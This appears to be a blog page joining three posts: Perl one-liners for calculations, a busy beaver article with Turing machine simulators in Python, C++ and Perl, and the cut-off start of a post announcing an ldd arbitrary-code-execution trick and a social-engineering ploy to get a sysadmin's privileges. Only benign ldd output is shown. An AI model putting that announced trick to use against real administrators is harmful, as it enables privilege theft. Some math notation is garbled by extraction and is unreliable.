This article is part of the article series "Perl One-Liners Explained."
<- previous article next article ->

Perl One LinersThis is the third part of a seven-part article on famous Perl one-liners. In this part I will create various one-liners for calculations. See part one for introduction of the series.

Famous Perl one-liners is my attempt to create "perl1line.txt" that is similar to "awk1line.txt" and "sed1line.txt" that have been so popular among Awk and Sed programmers.

The article on famous Perl one-liners will consist of at least seven parts:

After I'm done explaining all these one-liners, I'll publish an ebook. Subscribe to my blog to know when that happens!

The one-liners will make heavy use of Perl special variables. A few years ago I compiled all the Perl special variables in a single file and called it Perl special variable cheat-sheet. Even tho it's mostly copied out of perldoc perlvar, it's still handy to have in front of you, so print it.

Awesome news: I have written an e-book based on this article series. Check it out:

And here are today's one-liners:

Calculations

21. Check if a number is a prime.

perl -lne '(1x$_) !~ /^1?$|^(11+?)\1+$/ && print "$_ is prime"'

This one-liner uses an ingenious regular expression to detect if a given number is a prime or not. Don't take it too seriously, though. I included it for its artistic value.

First, the number is converted in its unary representation by " (1x$_) ". For example, 5 gets converted into " 1x5 ", which is " 11111 ".

Next, the unary number gets tested against the ingenious regular expression. If it doesn't match, the number is a prime, otherwise it's a composite.

The regular expression works this way. It consists of two parts " ^1?$ " and " ^(11+?)\1+$ ".

The first part matches " 1 " and empty string. Clearly, empty string and 1 are not prime numbers, therefore this regular expression matches, which indicated that they are not prime numbers.

The second part determines if two or more 1s repeatedly make up the whole number. If two or mores 1s repeatedly make up the whole number, the regex matches, which means that the number is composite. Otherwise it's a prime.

Let's look at the second regex part on numbers 5 and 6.

The number 5 in unary representation is " 11111 ". The " (11+?) " matches first two ones " 11 ". The back-reference " \1 " becomes " 11 " and the whole regex now becomes " ^11(11)+$ ". It can't match five ones, therefore it fails. But since it used " +? ", it backtracks and matches the first three ones " 111 ". The back-reference becomes " 111 " and the whole regex becomes " ^111(111)+$ ". It doesn't match again. This repeats for " 1111 " and " 11111 ", which also don't match, therefore the whole regex doesn't match and the number is a prime.

The number 4 in unary representation is " 1111 ". The " (11+?) " matches the first two ones " 11 ". The back-reference " \1 " becomes " 11 " and the regex becomes " ^11(11)+$ ". It matches the original string, therefore the number is not a prime.

The " -lne " command line options have been explained in parts one and two.

22. Print the sum of all the fields on a line.

perl -MList::Util=sum -alne 'print sum @F'

This one-liner turns on field auto-splitting with " -a " command line option and imports the "sum" function from "List::Util" module with " -MList::Util=sum " option. The "List::Util" is in the Perl core so you don't need to worry about installing it.

As a result of auto-splitting the split fields end up in the " @F " array and the " sum " function just sums them up.

The -Mmodule=arg option imports arg from module and is the same as writing:

use module qw(arg)

This one-liner is equivalent to the following:

use List::Util qw(sum);
while (<>) {
    @F = split(' ');
    print sum @F, "\n";
}

23. Print the sum of all the fields on all lines.

perl -MList::Util=sum -alne 'push @S,@F; END { print sum @S }'

This one-liner keeps pushing the split fields in " @F " to the " @S " array. Once the input is over and perl is about quit, END { } block gets called that outputs the sum of all items in @F. This sum is the sum of all fields over all lines.

This solution isn't too good - it creates a massive array @S. A better solution is to keep just the running:

perl -MList::Util=sum -alne '$s += sum @F; END { print $s }'

24. Shuffle all fields on a line.

perl -MList::Util=shuffle -alne 'print "@{[shuffle @F]}"'

This is almost the same as one-liner #22 above. Instead of summing all fields, it shuffles and prints them.

The " @{[shuffle @F]} " construct creates an array reference to the contents of " shuffle @F " and " @ { ... } " dereferences it. This is a tricky way to execute code inside quotes. It was needed to get the values of shuffled @F separated by a space when printing them out.

Another way to do the same is join the elements of @F by a space, but it's longer:

perl -MList::Util=shuffle -alne 'print join " ", shuffle @F'

25. Find the minimum element on a line.

perl -MList::Util=min -alne 'print min @F'

This one-liner uses the "min" function from "List::Util". It's similar to all the previous ones. After the line has been automatically split by " -a ", the "min" function finds minimum element and prints it.

26. Find the minimum element over all the lines.

perl -MList::Util=min -alne '@M = (@M, @F); END { print min @M }'

This one-liner is a combination of the previous one and the #23.

The "@M = (@M, @F)" construct is the same as "push @M, @F". It appends the contents of @F to the array @M.

This one-liner stores all the data in memory. If you run it on a 10 terabyte file, it will die. Therefore it's better to keep the running minimum element in memory and print it out at the end:

perl -MList::Util=min -alne '$min = min @F; $rmin = $min unless defined $rmin && $min > $rmin; END { print $rmin }'

It finds the minimum of each line and stores in $min, then it checks if $min is smaller than the running minimum. Once the input ends, it prints the running minimum, which is the smallest value over all input.

27. Find the maximum element on a line.

perl -MList::Util=max -alne 'print max @F'

This is the same as #25, except "min" has been replaced with "max".

28. Find the maximum element over all the lines.

perl -MList::Util=max -alne '@M = (@M, @F); END { print max @M }'

This is the same as #26.

Or:

perl -MList::Util=max -alne '$max = max @F; $rmax = $max unless defined $rmax && $max < $rmax; END { print $rmax }'

29. Replace each field with its absolute value.

perl -alne 'print "@{[map { abs } @F]}"'

This one-liner auto-splits the line by " -a " command line option. The split fields, as I already explained, end up in the @F variable. Next it calls the absolute value function "abs" on each field by the help of "map" function. Finally it prints it joins all the fields by the help of array interpolation in double quotes.

The " @{ ... } " construct was explained in one-liner #24.

30. Find the total number of fields (words) on each line.

perl -alne 'print scalar @F'

This one-liner forces to evaluate the @F in scalar context, which in Perl means "the number of elements in @F." Therefore this one-liner prints out the number of elements on each line.

31. Print the total number of fields (words) on each line followed by the line.

perl -alne 'print scalar @F, " $_"'

This is exactly the same as #30, except " $_ " is added at the end that prints out the whole line. (Remember that " -n " option caused each line to be put in the $_ variable.)

32. Find the total number of fields (words) on all lines.

perl -alne '$t += @F; END { print $t}'

Here we just keep adding the number of fields on each line to variable " $t ", and at the end we print it out. The result is number of words on all lines.

33. Print the total number of fields that match a pattern.

perl -alne 'map { /regex/ && $t++ } @F; END { print $t }'

This one-liner uses the " map " function that applies some operation on each of the elements in @F array. In this case the operation checks if each element matches /regex/ and if it does, it increments variable $t. At the end it prints this variable $t that contains the number of fields that matched /regex/ pattern.

A better way to do it is by looping:

perl -alne '$t += /regex/ for @F; END { print $t }'

Each element in @F is tested against regex. If it matches, /regex/ returns 1 (true), which gets added to variable $t. This way the number of matches get counted in $t.

The best way is to use grep in scalar context:

perl -alne '$t += grep /regex/, @F; END { print $t }'

Grep in scalar context returns the number of matches. This number gets accumulated in $t.

34. Print the total number of lines that match a pattern.

perl -lne '/regex/ && $t++; END { print $t }'

The /regex/ evaluates to true if the current line of input matches this regular expression. Writing /regex/ && $t++ is the same as if ($_ =~ /regex/) { $t++ }, which increments variable $t if the line matched the pattern. Finally in the END block the variable $t contains the total number of pattern matches and it gets printed out.

35. Print the number PI to n decimal places.

perl -Mbignum=bpi -le 'print bpi(21)'

The bignum package exports bpi function that calculates constant PI to wanted accuracy. This one-liner prints PI to 20 decimal places.

The bignum library also exports constant PI alone to 39 decimal places:

perl -Mbignum=PI -le 'print PI'

36. Print the number E to n decimal places.

perl -Mbignum=bexp -le 'print bexp(1,21)'

The bignum library also exports bexp function that takes two arguments - the power to raise e to and accuracy. This one-liner prints the constant e to 20 decimal places.

You can print the value of e^2 to 30 decimal places this way:

perl -Mbignum=bexp -le 'print bexp(2,31)'

Just the same as with PI, bignum exports the constant e alone to 39 decimal places:

perl -Mbignum=e -le 'print e'

37. Print UNIX time (seconds since Jan 1, 1970, 00:00:00 UTC).

perl -le 'print time'

The built-in function "time" returns seconds since the epoch.

38. Print GMT (Greenwich Mean Time) and local computer time.

perl -le 'print scalar gmtime'

The "gmtime" function is a Perl built-in function. If used in scalar context, it prints the time localized to Greenwich time zone.

perl -le 'print scalar localtime'

The "localtime" built-in function acts the same way as "gmtime", except it prints the computer's local time.

In array context both "gmtime" and "localtime" return a 9 element list (struct tm) with the following elements.

($second,             [0]
$minute,              [1]
$hour,                [2]
$month_day,           [3]
$month,               [4]
$year,                [5]
$week_day,            [6]
$year_day,            [7]
$is_daylight_saving   [8]
)

You may slice this list, or print individual elements if you need just some part of this information.

For example, to print H:M:S, slice elements 2, 1 and 0 from localtime:

perl -le 'print join ":", (localtime)[2,1,0]'

39. Print yesterday's date.

perl -MPOSIX -le '@now = localtime; $now[3] -= 1; print scalar localtime mktime @now'

Remember that localtime returns a 9-list (see above) of various date elements. The 4th element in the list is current month's day. If we subtract one from it we get yesterday. The "mktime" function constructs a Unix epoch time from this modified 9-list. And "scalar localtime" construct prints out the new date, which is yesterday.

The POSIX package was needed because it exports mktime function. It's supposed to normalize negative values.

40. Print date 14 months, 9 days and 7 seconds ago.

perl -MPOSIX -le '@now = localtime; $now[0] -= 7; $now[4] -= 14; $now[7] -= 9; print scalar localtime mktime @now'

This one-liner modifies 0th, 4th, and 7th elements of @now list. The 0th is seconds, the 4th is months and 7th is days (see the table of 9 element time list above).

Next, mktime creates Unix time from this new structure, and localtime, evaluated in scalar context, prints out the date that was 14 months, 9 days and 7 seconds ago.

41. Calculate factorial.

perl -MMath::BigInt -le 'print Math::BigInt->new(5)->bfac()'

This one-liner uses bfac() function from Math::BigInt module that is in the Perl core (no need to install).

Math::BigInt->new(5) construction creates a new Math::BigInt object with value 5, then a method bfac() is called on the newly created object to calculate the factorial of 5. Change 5 to any number you wish to find factorial for the value you are interested in.

Another way to calculate factorial is by just multiplying numbers from 1 to n together:

perl -le '$f = 1; $f *= $_ for 1..5; print $f'

Here we initially set $f to 1. Then do a loop from 1 to 5 and multiply $f by each of the values. The result is 1*2*3*4*5, which is the factorial of 5.

42. Calculate greatest common divisor.

perl -MMath::BigInt=bgcd -le 'print bgcd(@list_of_numbers)'

Math::BigInt has several other useful math functions. One of them is bgcd that calculates the greatest common divisor of a list of numbers.

For example, to find gcd of (20, 60, 30), you'd execute the one-liner this way:

perl -MMath::BigInt=bgcd -le 'print bgcd(20,60,30)'

Surely, you can also use Euclid's algorithm. Given two numbers $n and $m, this one-liner finds the gcd of $n and $m. The result is stored in $m.

perl -le '$n = 20; $m = 35; ($m,$n) = ($n,$m%$n) while $n; print $m'

43. Calculate least common multiple.

Another function from Math::BigInt is lcm - the least common multiplicator. This one-liner finds lcm of (35, 20, 8):

perl -MMath::BigInt=blcm -le 'print blcm(35,20,8)'

If you know some number theory, then you'll recall that there is a connection between gcd and lcm. Given two numbers $n and $m, their lcm is $n*$m/gcd($n,$m), therefore one-liner follows:

perl -le '$a = $n = 20; $b = $m = 35; ($m,$n) = ($n,$m%$n) while $n; print $a*$b/$m'

44. Generate 10 random numbers between 5 and 15 (excluding 15).

perl -le '$n=10; $min=5; $max=15; $, = " "; print map { int(rand($max-$min))+$min } 1..$n'

You can modify this one-liner by changing variables $n, $min, $max. The variable $n stands for how many random numbers to generate, and [$min,$max) is the generation range.

The variable $, gets set to a space because it's the output field separator for print and it's undef by default. If we didn't set it to a space, the numbers would get printed concatenated together.

45. Find and print all permutations of a list.

perl -MAlgorithm::Permute -le '$l = [1,2,3,4,5]; $p = Algorithm::Permute->new($l); print @r while @r = $p->next'

This one-liner uses the object-oriented interface of Algorithm::Permute module to find the permutations (all ways to rearrange items).

The constructor of Algorithm::Permute takes an array reference to an array of elements to permute. In this particular one-liner the elements are numbers 1, 2, 3, 4, 5.

The next object function returns the next permutation. Calling it repeatedly iterates over all permutations. Each permutation is put in @r array and is then printed.

Please note that the output list gets large really quickly. There are n! permutations for a list of n elements.

Another way to print out all permutations is to use the exported permute subroutine:

perl -MAlgorithm::Permute -le '@l = (1,2,3,4,5); Algorithm::Permute::permute { print "@l" } @l'

46. Generate the power set.

perl -MList::PowerSet=powerset -le '@l = (1,2,3,4,5); for (@{powerset(@l)}) { print "@$_" }'

Here I use the List::PowerSet module from CPAN.

It exports the powerset function, which takes a list of elements and returns a reference to a list containing references to subset lists.

In the for() loop, I call the powerset function, pass it the list of elements in @l. Next I dereference the return value of powerset, which is a reference to a list of subsets. Next, I dereference each individual subset @$_ and print it.

For a set of n elements, there are exactly 2n subsets in the powerset.

47. Convert an IP address to unsigned integer.

perl -le '$i=3; $u += ($_<<8*$i--) for "127.0.0.1" =~ /(\d+)/g; print $u'

This one-liner converts the IP address 127.0.0.1 into unsigned integer (which happens to be 2130706433).

It does it by first doing a global match of (\d+) on the IP address. Doing a for loop over a global match iterates over all the matches. These matches are the four parts of the IP address.

Next the matches are added together in the $u variable, with first being bit shifted 8*3 = 24 places, the second being shifted 8*2 = 16 places, the third 8 places and the last just getting added to $u.

But this one-liner doesn't do any error checking on the format of an IP address. You may use a more sophisticated regular expression to add checking, such as /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/g.

I had a discussion about this with a friend and we came up with several more one-liner:

perl -le '$ip="127.0.0.1"; $ip =~ s/(\d+)\.?/sprintf("%02x", $1)/ge; print hex($ip)'

This one-liner utilizes the fact that 127.0.0.1 can be easily converted to hex as 7f000001 and then converted to decimal from hex by the hex Perl function.

Another way is to use unpack:

perl -le 'print unpack("N", 127.0.0.1)'

This one-liner is probably as short as it can get. It uses the vstring literals (version strings) to express the IP address. A vstring forms a string literal composed of characters with the specified ordinal values. Next, the newly formed string literal is unpacked into a number from a string in Network byte order (Big-Endian order) and it gets printed.

If you have a string with an IP (and not a vstring), then you first have to convert the string with the function inet_aton to byte form:

perl -MSocket -le 'print unpack("N", inet_aton("127.0.0.1"))'

Here inet_aton converts the string " 127.0.0.1 " to the byte form (which is the same as pure vstring 127.0.0.1) and next it unpacks it as the same was as in previous one-liner.

If you want a reference of pack and unpack templates (such as "N" for Network order), get my Perl pack/unpack cheat sheet!

48. Convert an unsigned integer to an IP address.

perl -MSocket -le 'print inet_ntoa(pack("N", 2130706433))'

Here the integer 2130706433 first gets packed into a number in Big-Endian and then it gets passed to inet_ntoa function that converts a number back to an IP address.

Another way to do it is by bit shifting and printing one byte at a time:

perl -le '$ip = 2130706433; print join ".", map { (($ip>>8*($_))&0xFF) } reverse 0..3'

And by the way, join "." can be replaced by the special variable $, that acts as a value separator for print statement:

perl -le '$ip = 2130706433; $, = "."; print map { (($ip>>8*($_))&0xFF) } reverse 0..3'

See my Perl special variable cheat sheet for the list of all variables.

Perl one-liners explained e-book

I've now written the "Perl One-Liners Explained" e-book based on this article series. I went through all the one-liners, improved explanations, fixed mistakes and typos, added a bunch of new one-liners, added an introduction to Perl one-liners and a new chapter on Perl's special variables. Please take a look:

Have Fun!

Have fun with these one-liners for now. The next part is going to be about string and array creation.

Can you think of other calculations that I did not include here?

update: 2009.11.07 added printing PI and E (one liners 35 and 36).
update: 2009.11.15 added date calculations (one liners 37, 38, 39, 40).
update: 2009.12.14 added factorial, gcd, lcm, random numbers, (one liners 41, 42, 43, 44).
update: 2009.12.26 added permutations, power sets (one liners 45, 46).
update: 2009.12.27 added ip address calculations (one liners 47, 48).

Busy beaver putting ones on a Turing Machine’s tape
Busy Beaver puts another one on the Turing Machine's tape.
(image from a book "the new turing omnibus")

The busy beaver problem is a fun theoretical computer science problem to know. Intuitively, the problem is to find the smallest program that outputs as many data as possible and eventually halts. More formally it goes like this -- given an n-state Turing Machine with a two symbol alphabet {0, 1}, what is the maximum number of 1s that the machine may print on an initially blank tape (0-filled) before halting?

It turns out that this problem can't be solved. For a small number of states it can be reasoned about, but it can't be solved in general. Theorists call such problems non-computable.

Currently people have managed to solve it for n=1,2,3,4 (for Turing Machines with 1, 2, 3 and 4 states) by reasoning about and running all the possible Turing Machines, but for n ≥ 5 this task has currently been impossible. While most likely it will be solved for n=5, theorists doubt that it shall ever be computed for n=6.

Let's denote the number of 1s that the busy beaver puts on a tape after halting as S(n) and call it the busy beaver function (this is the solution to the busy beaver problem). The busy beaver function is also interesting -- it grows faster than any computable function. It grows like this:

  • S(1) = 1
  • S(2) = 4
  • S(3) = 6
  • S(4) = 13
  • S(5) ≥ 4098 (the exact result has not yet been found)
  • S(6) ≥ 4.6 · 101439 (the exact result shall never be known)

If we were to use one atom for each 1 that the busy beaver puts on the tape, at n=6 we would have filled the whole universe! That's how fast the busy beaver function is growing.

I decided to play with the busy beaver myself to verify the known results for n ≤ 5. I implemented a Turing Machine in Python, which turned out to be too slow, so I reimplemented it in C++ (source code of both implementations below).

I also wrote a visualization tool in Perl that shows how the Turing Machine's tape changes from the start to the finish (source code also below).

I used the following best known Turing Machines. Their tapes are initially filled with 0's, their starting state is " a " and halting state is " h ". The notation " a0 -> b1l " means "if we are in the state "a" and the current symbol on the tape is "0" then put a "1" in that cell, switch to state "b" and move to left "l". This process repeats until the machine ends up in the halting state.

Turing Machine for 1-state Busy Beaver:

a0 -> h1r

Turing Machine for 2-state Busy Beaver:

a0 -> b1r    a1 -> b1l
b0 -> a1l    b1 -> h1r

Here is how the trace of tape changes look like for the 2-state busy beaver:

Two State Busy Beaver
Tape changes for 2 state busy beaver.

Turing Machine for 3-state Busy Beaver:

a0 -> b1r    a1 -> h1r
b0 -> c0r    b1 -> b1r
c0 -> c1l    c1 -> a1l

Two State Busy Beaver
Tape changes for 3 state busy beaver.

Turing Machine for 4-state Busy Beaver:

a0 -> b1r    a1 -> b1l
b0 -> a1l    b1 -> c0l
c0 -> h1r    c1 -> d1l
d0 -> d1r    d1 -> a0r

Two State Busy Beaver
Tape changes for 4 state busy beaver.

Turing Machine for 5-state Busy Beaver:

a0 -> b1l    a1 -> a1l
b0 -> c1r    b1 -> b1r
c0 -> a1l    c1 -> d1r
d0 -> a1l    d1 -> e1r
e0 -> h1r    e1 -> c0r

This image is huge (6146 x 14293 pixels, but only 110KB in size). Click for full size.


Two State Busy Beaver

Tape changes for 5 state busy beaver.

Turing Machine for 6 state Busy Beaver:

a0 -> b1r    a1 -> e0l
b0 -> c1l    b1 -> a0r
c0 -> d1l    c1 -> c0r
d0 -> e1l    d1 -> f0l
e0 -> a1l    e1 -> c1l
f0 -> e1l    f1 -> h1r

Here is my Python program to simulate all these Turing Machines. But as I said, it turned out to be too slow. For the 5 state Busy Beaver it took 5 minutes to generate the currently best known solution.

Download: busy_beaver.py (3105)

#!/usr/bin/python
#
# Turing Machine simulator for Busy Beaver problem.
# Version 1.0
#

import sys

class Error(Exception):
    pass

class TuringMachine(object):
    def __init__(self, program, start, halt, init):
        self.program = program
        self.start = start
        self.halt = halt
        self.init = init
        self.tape = [self.init]
        self.pos = 0
        self.state = self.start
        self.set_tape_callback(None)
        self.tape_changed = 1
        self.movez = 0

    def run(self):
        tape_callback = self.get_tape_callback()
        while self.state != self.halt:
            if tape_callback:
                tape_callback(self.tape, self.tape_changed)

            lhs = self.get_lhs()
            rhs = self.get_rhs(lhs)

            new_state, new_symbol, move = rhs

            old_symbol = lhs[1]
            self.update_tape(old_symbol, new_symbol)
            self.update_state(new_state)
            self.move_head(move)

        if tape_callback:
            tape_callback(self.tape, self.tape_changed)

    def set_tape_callback(self, fn):
        self.tape_callback = fn

    def get_tape_callback(self):
        return self.tape_callback

    property(get_tape_callback, set_tape_callback)

    @property
    def moves(self):
        return self.movez

    def update_tape(self, old_symbol, new_symbol):
        if old_symbol != new_symbol:
            self.tape[self.pos] = new_symbol
            self.tape_changed += 1
        else:
            self.tape_changed = 0

    def update_state(self, state):
        self.state = state

    def get_lhs(self):
        under_cursor = self.tape[self.pos]
        lhs = self.state + under_cursor
        return lhs

    def get_rhs(self, lhs):
        if lhs not in self.program:
            raise Error('Could not find transition for state "%s".' % lhs)
        return self.program[lhs]

    def move_head(self, move):
        if move == 'l':
            self.pos -= 1
        elif move == 'r':
            self.pos += 1
        else:
            raise Error('Unknown move "%s". It can only be left or right.' % move)

        if self.pos < 0:
            self.tape.insert(0, self.init)
            self.pos = 0
        if self.pos >= len(self.tape):
            self.tape.append(self.init)

        self.movez += 1

beaver_programs = [
    { },

    {'a0': 'h1r' },

    {'a0': 'b1r', 'a1': 'b1l',
     'b0': 'a1l', 'b1': 'h1r'},

    {'a0': 'b1r', 'a1': 'h1r',
     'b0': 'c0r', 'b1': 'b1r',
     'c0': 'c1l', 'c1': 'a1l'},

    {'a0': 'b1r', 'a1': 'b1l',
     'b0': 'a1l', 'b1': 'c0l',
     'c0': 'h1r', 'c1': 'd1l',
     'd0': 'd1r', 'd1': 'a0r'},

    {'a0': 'b1l', 'a1': 'a1l',
     'b0': 'c1r', 'b1': 'b1r',
     'c0': 'a1l', 'c1': 'd1r',
     'd0': 'a1l', 'd1': 'e1r',
     'e0': 'h1r', 'e1': 'c0r'},

    {'a0': 'b1r', 'a1': 'e0l',
     'b0': 'c1l', 'b1': 'a0r',
     'c0': 'd1l', 'c1': 'c0r',
     'd0': 'e1l', 'd1': 'f0l',
     'e0': 'a1l', 'e1': 'c1l',
     'f0': 'e1l', 'f1': 'h1r'}
]

def busy_beaver(n):
    def tape_callback(tape, tape_changed):
        if tape_changed:
            print ''.join(tape)

    program = beaver_programs[n]

    print "Running Busy Beaver with %d states." % n
    tm = TuringMachine(program, 'a', 'h', '0')
    tm.set_tape_callback(tape_callback)
    tm.run()
    print "Busy beaver finished in %d steps." % tm.moves

def usage():
    print "Usage: %s [1|2|3|4|5|6]" % sys.argv[0]
    print "Runs Busy Beaver problem for 1 or 2 or 3 or 4 or 5 or 6 states."
    sys.exit(1)

if __name__ == "__main__":
    if len(sys.argv[1:]) < 1:
        usage()

    n = int(sys.argv[1])

    if n < 1 or n > 6:
        print "n must be between 1 and 6 inclusive"
        print
        usage()

    busy_beaver(n)

I rewrote the Turing Machine simulator in C++ and the speedup was huge. Now it took 14 seconds to execute the same Busy Beaver 5.

Download: busy_beaver.cpp (3033)

/*
** Turing Machine simulator for Busy Beaver problem.
** Version 1.0
*/

#include <cstdlib>
#include <iostream>
#include <utility>
#include <vector>
#include <string>
#include <map>

using namespace std;

typedef vector<char> Tape;
typedef map<string, string> Program;

class TuringMachine {
private:
    Tape tape;
    Program program;
    char start, halt, init, state;
    bool tape_changed;
    int moves;
    int pos;
public:
    TuringMachine(Program program, char start, char halt, char init):
        tape(1, init), program(program), start(start), halt(halt),
        init(init), state(start), moves(0), tape_changed(1), pos(0)
    { }

    void run() {
        while (state != halt) {
            print_tape();
            string lhs = get_lhs();
            string rhs = get_rhs(lhs);

            char new_state = rhs[0];
            char new_symbol = rhs[1];
            char move = rhs[2];

            char old_symbol = lhs[1];
            update_tape(old_symbol, new_symbol);
            update_state(new_state);
            move_head(move);
        }
        print_tape();
    }

    int get_moves() {
        return moves;
    }

private:
    inline void print_tape() {
        if (tape_changed) {
            for (int i=0; i<tape.size(); i++)
                cout << tape[i];
            cout << endl;
        }
    }

    inline string get_lhs() {
        char sp[3] = {0};
        sp[0] = state;
        sp[1] = tape[pos];
        return string(sp);
    }

    inline string get_rhs(string &lhs) {
        return program[lhs];
    }

    inline void update_tape(char old_symbol, char new_symbol) {
        if (old_symbol != new_symbol) {
            tape[pos] = new_symbol;
            tape_changed++;
        }
        else {
            tape_changed = 0;
        }
    }

    inline void update_state(char new_state) {
        state = new_state;
    }

    inline void move_head(char move) {
        if (move == 'l')
            pos -= 1;
        else if (move == 'r')
            pos += 1;
        else
            throw string("unknown state");

        if (pos < 0) {
            tape.insert(tape.begin(), init);
            pos = 0;
        }
        if (pos >= tape.size()) {
            tape.push_back(init);
        }
        moves++;
    }

};

vector<Program> busy_beavers;

void init_bb6()
{
    Program bb6;
    bb6.insert(make_pair("a0", "b1r"));
    bb6.insert(make_pair("b0", "c1l"));
    bb6.insert(make_pair("c0", "d1l"));
    bb6.insert(make_pair("d0", "e1l"));
    bb6.insert(make_pair("e0", "a1l"));
    bb6.insert(make_pair("f0", "e1l"));

    bb6.insert(make_pair("a1", "e0l"));
    bb6.insert(make_pair("b1", "a0r"));
    bb6.insert(make_pair("c1", "c0r"));
    bb6.insert(make_pair("d1", "f0l"));
    bb6.insert(make_pair("e1", "c1l"));
    bb6.insert(make_pair("f1", "h1r"));

    busy_beavers.push_back(bb6);
}

void init_bb5() 
{
    Program bb5;
    bb5.insert(make_pair("a0", "b1l"));
    bb5.insert(make_pair("b0", "c1r"));
    bb5.insert(make_pair("c0", "a1l"));
    bb5.insert(make_pair("d0", "a1l"));
    bb5.insert(make_pair("e0", "h1r"));

    bb5.insert(make_pair("a1", "a1l"));
    bb5.insert(make_pair("b1", "b1r"));
    bb5.insert(make_pair("c1", "d1r"));
    bb5.insert(make_pair("d1", "e1r"));
    bb5.insert(make_pair("e1", "c0r"));

    busy_beavers.push_back(bb5);
}

void init_bb4()
{
    Program bb4;
    bb4.insert(make_pair("a0", "b1r"));
    bb4.insert(make_pair("b0", "a1l"));
    bb4.insert(make_pair("c0", "h1r"));
    bb4.insert(make_pair("d0", "d1r"));

    bb4.insert(make_pair("a1", "b1l"));
    bb4.insert(make_pair("b1", "c0l"));
    bb4.insert(make_pair("c1", "d1l"));
    bb4.insert(make_pair("d1", "a0r"));

    busy_beavers.push_back(bb4);

}

void init_bb3()
{
    Program bb3;
    bb3.insert(make_pair("a0", "b1r"));
    bb3.insert(make_pair("b0", "c0r"));
    bb3.insert(make_pair("c0", "c1l"));

    bb3.insert(make_pair("a1", "h1r"));
    bb3.insert(make_pair("b1", "b1r"));
    bb3.insert(make_pair("c1", "a1l"));

    busy_beavers.push_back(bb3);
}

void init_bb2()
{
    Program bb2;
    bb2.insert(make_pair("a0", "b1r"));
    bb2.insert(make_pair("b0", "a1l"));

    bb2.insert(make_pair("a1", "b1l"));
    bb2.insert(make_pair("b1", "h1r"));

    busy_beavers.push_back(bb2);
}

void init_bb1()
{
    Program bb1;
    bb1.insert(make_pair("a0", "h1r"));

    busy_beavers.push_back(bb1);
}

void init_busy_beavers()
{
    busy_beavers.push_back(Program());
    init_bb1();
    init_bb2();
    init_bb3();
    init_bb4();
    init_bb5();
    init_bb6();
}

void busy_beaver(int n)
{
    cout << "Running Busy Beaver with " << n << " states." << endl;
    TuringMachine tm(busy_beavers[n], 'a', 'h', '0');
    tm.run();
    cout << "Busy Beaver finished in " << tm.get_moves() << " steps." << endl;
}

void usage(const char *prog)
{
    cout << "Usage: " << prog << " [1|2|3|4|5|6]\n";
    cout << "Runs Busy Beaver problem for 1 or 2 or 3 or 4 or 5 or 6 states." << endl;
    exit(1);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        usage(argv[0]);
    }

    int n = atoi(argv[1]);
    if (n < 1 || n > 6) {
        cout << "n must be between 1 and 6 inclusive!\n";
        cout << "\n";
        usage(argv[0]);
    }

    init_busy_beavers();
    busy_beaver(n);
}

And I also wrote a Perl program that uses the GD library to draw the tape changes on Turing Machines.

Download: draw_turing_machine.perl (2910)

#!/usr/bin/perl
#
# Given output from busy_beaver.py or busy_beaver.cpp,
# draws the turing machine tape changes.
#

use warnings;
use strict;
use GD;

$|++;

my $input_file = shift or die 'Usage: $0 <file with TM state transitions>';
my $cell_size = shift || 4;
my $im_file = "$input_file.png";

sub line_count { 
    my $count = 0;
    open my $fh, '<', shift or die $!;
    $count += tr/\n/\n/ while sysread($fh, $_, 2**20);
    return $count;
}

sub get_last_line {
    my $file = shift;
    my $last_line = `tail -1 $file`;
    chomp $last_line;
    return $last_line;
}

my $nr_lines = line_count $input_file;
my $last_line = get_last_line $input_file;
my $last_width = length($last_line);

my ($width, $height) = ($cell_size*$last_width, $cell_size*$nr_lines);

my $im = GD::Image->new($width, $height);
my $white = $im->colorAllocate(255,255,255);
my $dark = $im->colorAllocate(40, 40, 40);

my ($x, $y) = (0, $height-$cell_size);

print "Starting to draw the image. Total states: $nr_lines.\n";
print "It will be $width x $height pizels in size.\n";

my $prev_line;
my ($pad_left, $pad_right) = (0, 0);

sub pad {
    my ($line, $left, $right) = @_;
    return '0'x$left . $line . '0'x$right;
}

open my $fh, "-|", "/usr/bin/tac $input_file" or die $!;
while (<$fh>) {
    chomp;
    print "." if $. % 10 == 0;
    print "($.)" if $. % 500 == 0;

    $prev_line = $_ unless defined $prev_line;

    my $new_line;
    if (length $_ != length $prev_line) {
        if ($prev_line =~ /0$/) {
            $pad_right++;
        }
        elsif ($prev_line =~ /^0/) {
            $pad_left++;
        }
        else {
            die "unexpected data at $. in file $input_file";
        }
    }
    $new_line = pad($_, $pad_left, $pad_right);
    $prev_line = $_;

    my @cells = split //, $new_line;
    for my $cell (@cells) {
        $im->filledRectangle($x, $y, $x + $cell_size, $y + $cell_size,
                $cell ? $dark : $white);
        $x += $cell_size;
    }
    $y -= $cell_size;
    $x = 0;

}

print "\n";

{
    open my $fh, ">", $im_file or die $!;
    print $fh $im->png;
    close $fh;
}

print "Done. Image saved to $im_file.\n";

You can play with these programs yourself. Here is how. Run "busy_beaver.py <n>" with n=1,2,3,4,5,6. This will run the n-state busy beaver Turing Machine. The output will be the tape changes. Then use "draw_turing_machine.pl" to visualize the tape changes.

For example:

$ busy_beaver.py 4 > bb4
$ draw_turing_machine.pl bb4

There are variations of this problem. For example, the busiest beaver with 3 and more symbols. See "The Busy Beaver Competition" for these. The historical development is also interesting -- see The Busy Beaver Historical Survey for more info.

I first learned about the Busy Beaver problem from a book called "The New Turing Omnibus." It contains 66 different essays on various computer science subjects such as algorithms, turing machines, grammars, computability, randomness, and other fun topics. These essays are written in an accessible style that even a high school student can understand them. Each essay doesn't take more than 10 minutes to read. I recommend this book. Get it here:

The `ldd` utility is more vulnerable than you think. It's frequently used by programmers and system administrators to determine the dynamic library dependencies of executables. Sounds pretty innocent, right? Wrong!

In this article I am going to show you how to create an executable that runs arbitrary code if it's examined by `ldd`. I have also written a social engineering scenario on how you can get your sysadmin to unknowingly hand you his privileges.

I researched this subject thoroughly and found that it's almost completely undocumented. I have no idea how this could have gone unnoticed for such a long time. Here are the only few documents that mention this interesting behavior: 1, 2, 3, 4.

First let's understand how `ldd` works. Take a look at these three examples:

[1] $ ldd /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7eca000)
        /lib/ld-linux.so.2 (0xb801e000)

[2] $ LD_TRACE_LOADED_OBJECTS=1 /bin/grep
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7e30000)
        /lib/ld-linux.so.2 (0xb7f84000)

